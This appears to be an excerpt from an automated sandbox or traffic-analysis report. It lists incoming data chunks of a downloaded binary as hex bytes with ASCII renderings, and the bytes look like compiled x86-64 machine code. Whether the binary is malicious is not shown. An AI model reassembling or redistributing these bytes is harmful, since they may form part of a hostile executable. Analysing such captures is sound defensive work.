2022-11-07 22:48:53 UTC	1440	IN	Data Raw: 48 89 48 18 48 89 c1 48 8d 05 df 13 1d 00 eb 86 48 8d 78 18 48 8b 4c 24 78 e8 af 1f f0 ff eb e4 e8 48 02 f0 ff e9 83 fe ff ff cc cc cc 48 8d 05 0f 84 17 00 48 89 44 24 10 48 c7 44 24 18 03 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 44 24 c0 48 3b 41 10 0f 86 88 03 00 00 48 81 ec c0 00 00 00 48 89 ac 24 b8 00 00 00 48 8d ac 24 b8 00 00 00 48 8b 84 24 c8 00 00 00 66 90 48 85 c0 0f 84 33 03 00 00 48 8b 48 08 48 8b 10 48 8b 58 10 48 85 c9 0f 85 f4 02 00 00 31 c9 31 d2 48 89 94 24 b0 00 00 00 48 89 4c 24 70 48 83 78 28 00 0f 84 99 01 00 00 48 8b 48 18 48 89 0c 24 e8 5a ba ff ff 48 8b 84 24 c8 00 00 00 48 8b 48 20 48 8b 40 28 48 8b 54 24 08 48 89 94 24 a0 00 00 00 48 8b 5c 24 10 48 89 5c 24 60 48 8d 74 24 78 Data Ascii: HHHHHxHL$xHHHD$HD$eH%(HHD$H;AHH$H$H$fH3HHHHXH11H$HL$pHx(HHH$ZH$HH H@(HT$H$H\$H\$`Ht$x
2022-11-07 22:48:53 UTC	1456	IN	Data Raw: 28 e9 e7 67 ff ff cc cc cc cc cc cc cc 48 8b 44 24 08 84 00 48 89 44 24 08 0f 57 c0 0f 11 44 24 28 e9 87 69 ff ff cc cc cc cc cc cc cc 48 8b 44 24 08 84 00 48 89 44 24 08 0f 57 c0 0f 11 44 24 28 e9 27 6b ff ff cc cc cc cc cc cc cc 48 8b 44 24 08 84 00 48 89 44 24 08 48 c7 44 24 28 00 00 00 00 0f 57 c0 0f 11 44 24 30 0f 1f 00 e9 7b 63 ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 44 24 08 84 00 48 89 44 24 08 0f 57 c0 0f 11 44 24 10 e9 27 65 ff ff cc cc cc cc cc cc cc 48 8b 44 24 08 84 00 48 89 44 24 08 0f 57 c0 0f 11 44 24 10 e9 a7 66 ff ff cc cc cc cc cc cc cc 48 8b 44 24 08 84 00 48 89 44 24 08 48 c7 44 24 28 00 00 00 00 0f 57 c0 0f 11 44 24 30 0f 1f 00 e9 bb 60 ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: (gHD$HD$WD$(iHD$HD$WD$('kHD$HD$HD$(WD$0{cHD$HD$WD$'eHD$HD$WD$fHD$HD$HD$(WD$0`
2022-11-07 22:48:53 UTC	1472	IN	Data Raw: 85 c9 7c 64 48 85 c0 7d 5a 48 8d 05 fd 2c 13 00 48 89 04 24 e8 14 de e9 ff 48 8b 44 24 08 48 c7 40 08 2e 00 00 00 48 8d 0d 6e e7 17 00 48 89 08 48 c7 84 24 a8 00 00 00 00 00 00 00 48 8d 0d 0a 90 1c 00 48 89 8c 24 b0 00 00 00 48 89 84 24 b8 00 00 00 48 8b ac 24 80 00 00 00 48 81 c4 88 00 00 00 c3 48 39 c1 7c a1 48 8b 4c 24 48 48 8b 5c 24 68 48 8b 7c 24 60 e9 65 fc ff ff 48 8d 05 8a 2c 13 00 48 89 04 24 e8 a1 dd e9 ff 48 8b 44 24 08 48 c7 40 08 17 00 00 00 48 8d 0d 1b 68 17 00 48 89 08 48 c7 84 24 a8 00 00 00 00 00 00 00 48 8d 0d 97 8f 1c 00 48 89 8c 24 b0 00 00 00 48 89 84 24 b8 00 00 00 48 8b ac 24 80 00 00 00 48 81 c4 88 00 00 00 c3 48 89 1c 24 48 8d 05 a7 00 17 00 48 89 44 24 08 48 c7 44 24 10 01 00 00 00 e8 d9 21 e9 ff 0f b6 44 24 18 48 8b 4c 24 48 48 Data Ascii: \|dH}ZH,H$HD$H@.HnHH$HH$H$H$HH9\|HL$HH\$hH\|$`eH,H$HD$H@HhHH$HH$H$H$HH$HHD$HD$!D$HL$HH
2022-11-07 22:48:53 UTC	1488	IN	Data Raw: 24 b0 48 3b 41 10 0f 86 59 04 00 00 48 81 ec d0 00 00 00 48 89 ac 24 c8 00 00 00 48 8d ac 24 c8 00 00 00 48 8b 84 24 d8 00 00 00 48 8b 08 48 83 79 10 00 0f 85 11 04 00 00 31 c9 48 85 c9 0f 84 ee 03 00 00 48 8b 8c 24 f8 00 00 00 48 83 79 10 00 0f 85 bf 03 00 00 31 d2 48 83 fa 01 7d 18 c6 84 24 08 01 00 00 00 48 8b ac 24 c8 00 00 00 48 81 c4 d0 00 00 00 c3 48 8b 50 08 48 89 0c 24 48 89 54 24 08 e8 c4 37 f8 ff 48 83 7c 24 10 00 7d ce 48 8b 84 24 00 01 00 00 48 83 78 10 00 0f 85 57 03 00 00 31 c9 48 83 f9 01 7d 18 c6 84 24 08 01 00 00 00 48 8b ac 24 c8 00 00 00 48 81 c4 d0 00 00 00 c3 48 8b 8c 24 d8 00 00 00 48 8b 51 08 48 89 04 24 48 89 54 24 08 e8 6f 37 f8 ff 48 83 7c 24 10 00 7d c6 c6 84 24 a8 00 00 00 00 48 c7 84 24 b0 00 00 00 00 00 00 00 0f 57 c0 0f 11 Data Ascii: $H;AYHH$H$H$HHy1HH$Hy1H}$H$HHPH$HT$7H\|$}H$HxW1H}$H$HH$HQH$HT$o7H\|$}$H$W
2022-11-07 22:48:53 UTC	1504	IN	Data Raw: 48 8b 44 24 08 48 8b 4c 24 10 0f 57 c0 0f 11 44 24 60 48 89 04 24 48 89 4c 24 08 e8 2d 2c e9 ff 48 8b 44 24 10 48 8d 0d a1 39 11 00 48 89 4c 24 60 48 89 44 24 68 48 8d 05 7c 92 17 00 48 89 04 24 48 c7 44 24 08 3e 00 00 00 48 8d 44 24 60 48 89 44 24 10 48 c7 44 24 18 01 00 00 00 48 c7 44 24 20 01 00 00 00 e8 02 21 f7 ff 48 8b 44 24 28 48 8b 4c 24 30 c6 84 24 98 00 00 00 00 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 8b 6c 24 70 48 83 c4 78 c3 e8 d1 01 ef ff e9 ec fb ff ff cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 18 48 89 6c 24 10 48 8d 6c 24 10 48 8b 54 24 38 48 8b 1a 48 8b 74 24 28 0f 1f 44 00 00 48 39 72 08 75 67 48 8b 7c 24 20 31 c0 eb 03 48 ff c0 48 39 f0 7d 3f 48 8b 4a 20 4c 8b 42 18 90 48 39 c8 73 5f 45 0f b6 04 00 44 0f b6 0c 07 45 21 c1 Data Ascii: HD$HL$WD$`H$HL$-,HD$H9HL$`HD$hH\|H$HD$>HD$`HD$HD$HD$ !HD$(HL$0$H$H$Hl$pHxHHl$Hl$HT$8HHt$(DH9rugH\|$ 1HH9}?HJ LBH9s_EDE!
2022-11-07 22:48:53 UTC	1520	IN	Data Raw: 54 24 10 48 8b 1d 33 eb 32 00 48 8b 35 34 eb 32 00 48 8b 3d 35 eb 32 00 48 89 5c 24 18 48 89 74 24 20 48 89 7c 24 28 e8 41 1f fa ff 80 7c 24 30 00 0f 85 d3 00 00 00 48 8b 44 24 48 48 89 04 24 48 8b 4c 24 50 48 89 4c 24 08 48 8b 54 24 58 48 89 54 24 10 48 8b 1d 02 eb 32 00 48 8b 35 03 eb 32 00 48 8b 3d 04 eb 32 00 48 89 5c 24 18 48 89 74 24 20 48 89 7c 24 28 e8 f0 1e fa ff 80 7c 24 30 00 75 73 48 8b 44 24 48 48 89 04 24 48 8b 44 24 50 48 89 44 24 08 48 8b 44 24 58 48 89 44 24 10 48 8b 05 d5 ea 32 00 48 8b 0d d6 ea 32 00 48 8b 15 d7 ea 32 00 48 89 44 24 18 48 89 4c 24 20 48 89 54 24 28 e8 a3 1e fa ff 80 7c 24 30 00 74 13 48 c7 44 24 60 04 00 00 00 48 8b 6c 24 38 48 83 c4 40 c3 48 c7 44 24 60 00 00 00 00 48 8b 6c 24 38 48 83 c4 40 c3 48 c7 44 24 60 03 00 00 Data Ascii: T$H32H542H=52H\$Ht$ H\|$(A\|$0HD$HH$HL$PHL$HT$XHT$H2H52H=2H\$Ht$ H\|$(\|$0usHD$HH$HD$PHD$HD$XHD$H2H2H2HD$HL$ HT$(\|$0tHD$`Hl$8H@HD$`Hl$8H@HD$`
2022-11-07 22:48:53 UTC	1536	IN	Data Raw: 00 00 48 8d 0d 44 90 1b 00 48 89 8c 24 e8 04 00 00 48 89 84 24 f0 04 00 00 48 8b ac 24 c8 04 00 00 48 81 c4 d0 04 00 00 c3 48 c7 84 24 e0 04 00 00 00 00 00 00 48 89 84 24 e8 04 00 00 48 89 8c 24 f0 04 00 00 48 8b ac 24 c8 04 00 00 48 81 c4 d0 04 00 00 c3 48 89 34 24 48 8b 84 24 78 01 00 00 48 89 44 24 08 0f 10 84 24 80 01 00 00 0f 11 44 24 10 0f 10 84 24 90 01 00 00 0f 11 44 24 20 0f 10 84 24 a0 01 00 00 0f 11 44 24 30 e8 db e6 ff ff 48 8b 44 24 48 0f b6 4c 24 40 48 8b 54 24 50 48 85 c0 75 2c 48 8b 84 24 60 01 00 00 48 8b 94 24 c8 00 00 00 48 8b b4 24 e0 00 00 00 89 cb 48 8b 8c 24 d0 00 00 00 0f 1f 44 00 00 e9 5e f3 ff ff 48 c7 84 24 e0 04 00 00 00 00 00 00 48 89 84 24 e8 04 00 00 48 89 94 24 f0 04 00 00 48 8b ac 24 c8 04 00 00 48 81 c4 d0 04 00 00 c3 48 Data Ascii: HDH$H$H$HH$H$H$H$HH4$H$xHD$$D$$D$ $D$0HD$HL$@HT$PHu,H$`H$H$H$D^H$H$H$H$HH
2022-11-07 22:48:53 UTC	1552	IN	Data Raw: 84 24 f8 01 00 00 48 c7 84 24 08 02 00 00 00 00 00 00 48 8d 05 34 50 1b 00 48 89 84 24 10 02 00 00 48 89 bc 24 18 02 00 00 48 8b ac 24 88 01 00 00 48 81 c4 90 01 00 00 c3 48 8b 84 24 f0 00 00 00 e8 87 5e ee ff e9 74 ff ff ff 48 8b 84 24 60 01 00 00 48 8b 8c 24 58 01 00 00 48 89 8c 24 08 01 00 00 48 8b 94 24 68 01 00 00 48 89 94 24 88 00 00 00 48 83 f8 08 0f 85 fb 02 00 00 48 8d 5a fc 48 89 de 48 f7 db 48 c1 fb 3f 48 83 e3 04 48 01 cb 48 83 c0 fc bf 04 00 00 00 48 89 bc 24 80 00 00 00 48 89 74 24 78 48 89 44 24 70 48 89 9c 24 00 01 00 00 48 89 1c 24 48 89 44 24 08 48 89 74 24 10 e8 05 a6 ff ff 80 7c 24 18 00 0f 84 a4 01 00 00 48 8d 05 b3 74 12 00 48 89 04 24 e8 4a 9d e8 ff 48 8b 7c 24 08 48 8b 84 24 80 00 00 00 48 89 47 08 48 8b 84 24 88 00 00 00 48 89 47 Data Ascii: $H$H4PH$H$H$HH$^tH$`H$XH$H$hH$HHZHHH?HHHH$Ht$xHD$pH$H$HD$Ht$\|$HtH$JH\|$H$HGH$HG
2022-11-07 22:48:53 UTC	1568	IN	Data Raw: 00 00 48 8b b4 24 e0 01 00 00 0f 1f 00 48 39 c3 0f 82 7d 04 00 00 49 89 d0 48 29 c2 49 89 d1 48 f7 da 48 c1 fa 3f 48 21 c2 4c 8d 14 16 49 89 db 48 29 c3 49 39 c9 0f 82 4f 04 00 00 48 39 cb 0f 82 3b 04 00 00 4c 89 4c 24 68 4c 89 94 24 a8 01 00 00 4c 89 44 24 60 48 89 b4 24 b8 01 00 00 4c 89 c8 49 29 c9 4c 89 4c 24 58 4c 89 ca 49 f7 d9 49 c1 f9 3f 49 21 c9 4d 01 d1 4c 89 8c 24 c0 01 00 00 48 85 db 0f 85 2d 03 00 00 0f 57 c0 0f 11 84 24 80 00 00 00 0f 11 84 24 90 00 00 00 48 8b 84 24 d8 01 00 00 84 00 48 8d bc 24 f8 00 00 00 48 8d 7f f0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 24 25 ee ff 48 8b 6d 00 48 8d 8c 24 f8 00 00 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 20 00 00 00 48 c7 44 24 18 20 00 00 00 48 8b 84 24 f8 01 00 00 48 89 44 24 20 48 8b 84 24 00 02 00 00 Data Ascii: H$H9}IH)IHH?H!LIH)I9OH9;LL$hL$LD$`H$LI)LL$XLII?I!ML$H-W$$H$H$HHl$Hl$$%HmH$H$HD$HD$ HD$ H$HD$ H$
2022-11-07 22:48:53 UTC	1584	IN	Data Raw: 0f f6 04 c4 43 35 0f c9 04 c4 43 2d 0f d2 04 c4 43 1d 0f e4 08 c4 43 15 0f ed 08 c4 43 3d 0f c0 08 c4 e3 5d 0f e4 0c c4 e3 75 0f c9 0c c4 e3 6d 0f d2 0c c4 c1 7d fe c6 c5 dd ef e0 c4 e2 5d 00 25 08 de 1a 00 c5 1d fe e4 c4 41 0d ef f4 c4 c1 65 72 f6 0c c4 c1 0d 72 d6 14 c5 0d ef f3 c4 c1 7d fe c6 c5 dd ef e0 c4 e2 5d 00 25 fd dd 1a 00 c5 1d fe e4 c4 41 0d ef f4 c4 c1 65 72 f6 07 c4 c1 0d 72 d6 19 c5 0d ef f3 c4 c1 55 fe e9 c5 f5 ef cd c4 e2 75 00 0d b2 dd 1a 00 c5 15 fe e9 c4 41 35 ef cd c4 c1 65 72 f1 0c c4 c1 35 72 d1 14 c5 35 ef cb c4 c1 55 fe e9 c5 f5 ef cd c4 e2 75 00 0d a7 dd 1a 00 c5 15 fe e9 c4 41 35 ef cd c4 c1 65 72 f1 07 c4 c1 35 72 d1 19 c5 35 ef cb c4 c1 4d fe f2 c5 ed ef d6 c4 e2 6d 00 15 5c dd 1a 00 c5 3d fe c2 c4 41 2d ef d0 c4 c1 65 72 f2 Data Ascii: C5C-CCC=]um}]%Aerr}]%AerrUuA5er5r5UuA5er5r5Mm\=A-er
2022-11-07 22:48:53 UTC	1600	IN	Data Raw: ef cd c4 e2 75 00 0d 62 9e 1a 00 c5 15 fe e9 c4 41 35 ef cd c4 c1 05 72 f1 07 c4 c1 35 72 d1 19 c4 41 35 ef cf c4 c1 4d fe f2 c5 ed ef d6 c4 e2 6d 00 15 16 9e 1a 00 c5 3d fe c2 c4 41 2d ef d0 c4 c1 05 72 f2 0c c4 c1 2d 72 d2 14 c4 41 2d ef d7 c4 c1 4d fe f2 c5 ed ef d6 c4 e2 6d 00 15 0a 9e 1a 00 c5 3d fe c2 c4 41 2d ef d0 c4 c1 05 72 f2 07 c4 c1 2d 72 d2 19 c4 41 2d ef d7 c5 7d 6f bd e0 00 00 00 c5 7d 7f ad e0 00 00 00 c4 c1 45 fe fb c5 e5 ef df c4 e2 65 00 1d ae 9d 1a 00 c5 05 fe fb c4 41 25 ef df c4 c1 15 72 f3 0c c4 c1 25 72 d3 14 c4 41 25 ef dd c4 c1 45 fe fb c5 e5 ef df c4 e2 65 00 1d a2 9d 1a 00 c5 05 fe fb c4 41 25 ef df c4 c1 15 72 f3 07 c4 c1 25 72 d3 19 c4 41 25 ef dd c5 7d 6f ad e0 00 00 00 c4 43 0d 0f f6 0c c4 43 1d 0f e4 08 c4 e3 5d 0f e4 04 Data Ascii: ubA5r5rA5Mm=A-r-rA-Mm=A-r-rA-}o}EeA%r%rA%EeA%r%rA%}oCC]
2022-11-07 22:48:53 UTC	1616	IN	Data Raw: 48 01 ce 48 89 f1 48 c1 e9 33 4c 01 c1 48 21 d6 49 89 c8 48 c1 e9 33 4c 01 d1 49 21 d0 49 89 c9 48 c1 e9 33 4c 01 e1 49 21 d1 48 89 c8 48 c1 e9 33 4c 01 f1 48 21 d0 49 89 ca 48 c1 e9 33 48 6b c9 13 48 01 ce 49 21 d2 48 89 74 24 78 4c 89 84 24 80 00 00 00 4c 89 8c 24 88 00 00 00 48 89 84 24 90 00 00 00 4c 89 94 24 98 00 00 00 48 89 f6 4c 89 c2 4c 89 c9 49 89 c0 4d 89 d1 48 03 35 12 e7 19 00 48 03 15 13 e7 19 00 48 03 0d 0c e7 19 00 4c 03 05 05 e7 19 00 4c 03 0d fe e6 19 00 48 2b 74 24 50 48 2b 54 24 58 48 2b 4c 24 60 4c 2b 44 24 68 4c 2b 4c 24 70 48 89 b4 24 a0 00 00 00 48 89 94 24 a8 00 00 00 48 89 8c 24 b0 00 00 00 4c 89 84 24 b8 00 00 00 4c 89 8c 24 c0 00 00 00 48 8b 77 78 48 8b 97 80 00 00 00 48 8b 8f 88 00 00 00 4c 8b 87 90 00 00 00 4c 8b 8f 98 00 00 Data Ascii: HHH3LH!IH3LI!IH3LI!HH3LH!IH3HkHI!Ht$xL$L$H$L$HLLIMH5HHLLH+t$PH+T$XH+L$`L+D$hL+L$pH$H$H$L$L$HwxHHLL
2022-11-07 22:48:53 UTC	1632	IN	Data Raw: 44 24 50 48 89 44 24 08 48 8b 44 24 58 48 89 44 24 10 e8 76 86 fa ff 48 8b 44 24 18 48 8b 4c 24 20 0f b6 54 24 78 84 d2 74 59 48 89 04 24 48 89 4c 24 08 48 8b 44 24 60 48 89 44 24 10 48 8b 44 24 68 48 89 44 24 18 48 8b 44 24 70 48 89 44 24 20 e8 d7 82 f4 ff 48 8b 44 24 28 48 8b 4c 24 30 48 85 c0 74 04 48 8b 40 08 48 89 84 24 80 00 00 00 48 89 8c 24 88 00 00 00 48 8b 6c 24 38 48 83 c4 40 c3 48 89 04 24 48 89 4c 24 08 48 8b 44 24 60 48 89 44 24 10 48 8b 44 24 68 48 89 44 24 18 48 8b 44 24 70 48 89 44 24 20 0f 1f 00 e8 3b 7d f4 ff 48 8b 44 24 28 48 8b 4c 24 30 48 85 c0 74 04 48 8b 40 08 48 89 84 24 80 00 00 00 48 89 8c 24 88 00 00 00 48 8b 6c 24 38 48 83 c4 40 c3 e8 89 01 ed ff e9 e4 fe ff ff cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b Data Ascii: D$PHD$HD$XHD$vHD$HL$ T$xtYH$HL$HD$`HD$HD$hHD$HD$pHD$ HD$(HL$0HtH@H$H$Hl$8H@H$HL$HD$`HD$HD$hHD$HD$pHD$ ;}HD$(HL$0HtH@H$H$Hl$8H@eH%(HH;
2022-11-07 22:48:53 UTC	1648	IN	Data Raw: 00 00 00 48 8d 05 c3 d6 19 00 48 89 84 24 90 01 00 00 48 8d 05 a4 aa 2e 00 48 89 84 24 98 01 00 00 48 8b ac 24 40 01 00 00 48 81 c4 48 01 00 00 c3 44 0f b6 ac 24 97 00 00 00 49 89 fc e9 32 fc ff ff 48 8d 05 04 cc 10 00 48 89 04 24 48 8b 84 24 00 01 00 00 48 89 44 24 08 48 8b 8c 24 38 01 00 00 48 89 4c 24 10 e8 e1 f1 e6 ff 48 8b 44 24 18 48 8b 4c 24 20 80 7c 24 28 00 0f 85 af 02 00 00 48 8d 05 85 69 10 00 48 89 04 24 48 8b 84 24 00 01 00 00 48 89 44 24 08 48 8b 84 24 38 01 00 00 48 89 44 24 10 e8 a2 f1 e6 ff 48 8b 44 24 18 48 8b 4c 24 20 80 7c 24 28 00 0f 84 da 05 00 00 48 89 8c 24 28 01 00 00 48 89 84 24 d8 00 00 00 48 8b 50 18 48 89 0c 24 ff d2 48 8b 84 24 50 01 00 00 48 8b 48 30 48 8b 54 24 08 48 89 94 24 e8 00 00 00 48 8b 58 38 48 8b 49 20 48 89 1c 24 Data Ascii: HH$H.H$H$@HHD$I2HH$H$HD$H$8HL$HD$HL$ \|$(HiH$H$HD$H$8HD$HD$HL$ \|$(H$(H$HPH$H$PHH0HT$H$HX8HI H$
2022-11-07 22:48:53 UTC	1664	IN	Data Raw: 94 24 98 03 00 00 0f 1f 80 00 00 00 00 48 39 ca 0f 85 9e 01 00 00 48 8b 84 24 88 03 00 00 48 89 84 24 28 04 00 00 0f 10 84 24 90 03 00 00 0f 11 84 24 30 04 00 00 0f 10 84 24 a0 03 00 00 0f 11 84 24 40 04 00 00 48 8d 05 60 96 19 00 48 89 04 24 48 8d 84 24 28 04 00 00 48 89 44 24 08 e8 ea ad e6 ff 48 8b 44 24 18 48 89 84 24 40 02 00 00 48 8b 4c 24 10 48 89 8c 24 88 00 00 00 48 8d 15 89 2f 10 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 e8 16 b0 e6 ff 48 8b 44 24 20 48 8b 4c 24 18 80 7c 24 28 00 75 73 48 8b 84 24 88 00 00 00 48 8b 8c 24 60 04 00 00 48 89 81 68 01 00 00 83 3d 77 89 34 00 00 75 3d 48 8b 84 24 40 02 00 00 48 89 81 70 01 00 00 48 8b 81 68 01 00 00 48 8b 89 70 01 00 00 48 89 84 24 70 04 00 00 48 89 8c 24 78 04 00 00 48 8b ac 24 50 04 00 00 48 81 Data Ascii: $H9H$H$($$0$$@H`H$H$(HD$HD$H$@HL$H$H/H$HL$HD$HD$ HL$\|$(usH$H$`Hh=w4u=H$@HpHhHpH$pH$xH$PH
2022-11-07 22:48:53 UTC	1680	IN	Data Raw: 30 48 83 c4 38 c3 48 8b 05 d0 07 31 00 48 8b 0d d1 07 31 00 48 89 44 24 48 48 89 4c 24 50 48 8b 6c 24 30 48 83 c4 38 c3 0f 1f 44 00 00 e8 3b 42 ec ff e9 b6 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 1c 01 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 0f 57 c0 0f 11 44 24 30 c6 44 24 27 00 0f 57 c0 0f 11 44 24 58 31 c0 48 8b 4c 24 50 ba 01 00 00 00 f0 0f b1 91 f0 01 00 00 0f 94 c2 48 8d 99 f0 01 00 00 0f 1f 44 00 00 84 d2 0f 84 a2 00 00 00 48 8d 05 e1 4d 15 00 48 89 44 24 38 48 89 5c 24 30 c6 44 24 27 01 80 b9 28 01 00 00 00 74 35 48 8b 81 18 01 00 00 48 8b 89 20 01 00 00 48 89 44 24 58 48 89 4c 24 60 c6 44 24 27 00 48 8b 44 24 30 48 89 04 24 e8 2e 16 ed ff Data Ascii: 0H8H1H1HD$HHL$PHl$0H8D;BeH%(HH;aHHHl$@Hl$@WD$0D$'WD$X1HL$PHDHMHD$8H\$0D$'(t5HH HD$XHL$`D$'HD$0H$.
2022-11-07 22:48:53 UTC	1696	IN	Data Raw: 48 89 84 24 10 02 00 00 48 8d 05 be 30 0f 00 48 89 84 24 18 02 00 00 48 8b 84 24 f0 01 00 00 48 89 84 24 20 02 00 00 48 8d 05 eb 9d 14 00 48 89 04 24 48 c7 44 24 08 49 00 00 00 48 8d 84 24 08 02 00 00 48 89 44 24 10 48 c7 44 24 18 02 00 00 00 48 c7 44 24 20 02 00 00 00 e8 0e 21 f4 ff 48 8b 44 24 30 48 8b 4c 24 28 48 89 8c 24 e0 02 00 00 48 89 84 24 e8 02 00 00 48 8b ac 24 c8 02 00 00 48 81 c4 d0 02 00 00 c3 48 89 14 24 e8 7b e4 00 00 48 8b 84 24 d8 02 00 00 48 8d 48 20 48 89 8c 24 e0 01 00 00 48 89 0c 24 0f 1f 00 e8 fb 6c 01 00 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 2a 9a ff ff 48 8b 44 24 18 48 8b 4c 24 08 48 8b 54 24 10 48 8b 5c 24 20 48 85 c0 0f 85 ff 15 00 00 48 8d 1d e6 31 0f 00 66 0f 1f 44 00 00 48 39 cb 0f 85 dc 15 00 00 48 89 d0 0f 85 c9 15 00 00 Data Ascii: H$H0H$H$H$ HH$HD$IH$HD$HD$HD$ !HD$0HL$(H$H$H$HH${H$HH H$H$lH$H$*HD$HL$HT$H\$ HH1fDH9H
2022-11-07 22:48:53 UTC	1712	IN	Data Raw: 24 48 89 4c 24 08 48 8d 44 24 40 48 89 44 24 10 e8 38 8c e6 ff 48 8b 4c 24 38 e9 41 ff ff ff 48 8b 84 24 d0 00 00 00 48 89 04 24 48 8b 02 ff d0 48 8b 44 24 08 48 8b 4c 24 10 48 8b 5c 24 18 48 89 84 24 d8 00 00 00 48 89 8c 24 e0 00 00 00 48 89 9c 24 e8 00 00 00 48 8b ac 24 b8 00 00 00 48 81 c4 c0 00 00 00 c3 e8 01 c2 eb ff 90 e9 db fd ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 3a 01 00 00 48 83 ec 40 48 89 6c 24 38 48 8d 6c 24 38 48 8b 54 24 50 48 85 d2 0f 8e 07 01 00 00 48 8b 5c 24 48 80 3b 5b 66 90 0f 85 ec 00 00 00 0f b6 74 13 ff 40 80 fe 5d 0f 85 dd 00 00 00 48 8d 4a ff 0f 1f 80 00 00 00 00 48 83 f9 01 0f 82 df 00 00 00 48 8d 42 fe 48 89 c1 48 Data Ascii: $HL$HD$@HD$8HL$8AH$H$HHD$HL$H\$H$H$H$H$HeH%(HH;a:H@Hl$8Hl$8HT$PHH\$H;[ft@]HJHHBHH
2022-11-07 22:48:53 UTC	1728	IN	Data Raw: 30 48 8b 4c 24 38 0f 1f 80 00 00 00 00 48 85 c0 0f 85 2d 01 00 00 48 8b 44 24 58 48 8d 88 f0 01 00 00 48 8b 94 24 a0 00 00 00 48 8b 5a 70 48 8b b2 a0 00 00 00 48 8b ba a8 00 00 00 4c 8b 82 b0 00 00 00 48 89 0c 24 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 4c 89 44 24 20 e8 8d b5 fe ff 48 8b 44 24 58 48 8b 48 48 80 b9 c1 00 00 00 00 74 1c 0f 57 c0 0f 11 84 24 a8 00 00 00 48 8b ac 24 90 00 00 00 48 81 c4 98 00 00 00 90 c3 48 83 b9 e8 00 00 00 00 74 da 48 8b 84 24 a0 00 00 00 48 8b 48 70 48 8b 90 88 00 00 00 48 8b 98 90 00 00 00 48 8b b0 98 00 00 00 48 8b 78 78 48 8b 80 80 00 00 00 48 89 0c 24 48 89 54 24 08 48 89 5c 24 10 48 89 74 24 18 48 8d 0d 77 1b 13 00 48 89 4c 24 20 48 c7 44 24 28 0a 00 00 00 48 89 7c 24 30 48 89 44 24 38 e8 32 c7 00 00 48 8b 44 24 Data Ascii: 0HL$8H-HD$XHH$HZpHHLH$H\$Ht$H\|$LD$ HD$XHHHtW$H$HHtH$HHpHHHHxxHH$HT$H\$Ht$HwHL$ HD$(H\|$0HD$82HD$
2022-11-07 22:48:53 UTC	1744	IN	Data Raw: 48 89 b4 24 80 00 00 00 49 8d 70 fe 48 89 b4 24 88 00 00 00 48 f7 de 48 c1 fe 3f 48 83 e6 02 48 01 d6 48 89 74 24 78 b8 02 00 00 00 48 89 d1 e9 a7 f3 ff ff b8 01 00 00 00 e9 d5 f3 ff ff 48 83 c6 fc 48 89 b4 24 80 00 00 00 49 8d 70 fc 48 89 b4 24 88 00 00 00 48 f7 de 48 c1 fe 3f 48 83 e6 04 48 01 d6 48 89 74 24 78 48 89 d0 90 e9 3b f3 ff ff 48 8d 05 d4 30 12 00 48 89 04 24 48 89 7c 24 08 e8 86 0e e6 ff 48 8b bc 24 00 01 00 00 48 8b 94 24 08 01 00 00 e8 51 5f eb ff 48 89 fb e9 cf f2 ff ff 48 89 c1 b8 01 00 00 00 90 e8 bb 62 eb ff 48 89 c1 31 c0 e8 b1 62 eb ff 48 89 c1 b8 01 00 00 00 e8 a4 62 eb ff 48 89 c1 31 c0 e8 9a 62 eb ff 48 89 c1 b8 01 00 00 00 e8 8d 62 eb ff 48 89 c1 31 c0 e8 83 62 eb ff 48 89 c1 b8 01 00 00 00 e8 76 62 eb ff 48 89 c1 31 c0 e8 6c 62 Data Ascii: H$IpH$HH?HHHt$xHHH$IpH$HH?HHHt$xH;H0H$H\|$H$H$Q_HHbH1bHbH1bHbH1bHvbH1lb
2022-11-07 22:48:53 UTC	1760	IN	Data Raw: ff 48 89 c1 31 c0 e8 62 23 eb ff 90 90 e8 5b 02 eb ff e9 16 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 76 59 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 48 8d 05 35 3b 0d 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 da 38 e9 ff 48 8b 44 24 18 c6 00 0e 48 89 44 24 38 48 c7 44 24 40 04 00 00 00 48 c7 44 24 48 04 00 00 00 48 8b 6c 24 20 48 83 c4 28 c3 e8 cc 01 eb ff eb 8a cc cc cc cc cc cc cc cc cc cc 48 8b 44 24 18 48 83 f8 04 0f 94 44 24 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 7d 01 00 00 48 83 ec 40 48 89 6c 24 38 48 8d 6c 24 38 48 8b 44 24 48 48 8b 08 48 8b Data Ascii: H1b#[eH%(HH;avYH(Hl$ Hl$ H5;H$HD$HD$8HD$HD$8HD$@HD$HHl$ H(HD$HD$(eH%(HH;a}H@Hl$8Hl$8HD$HHH
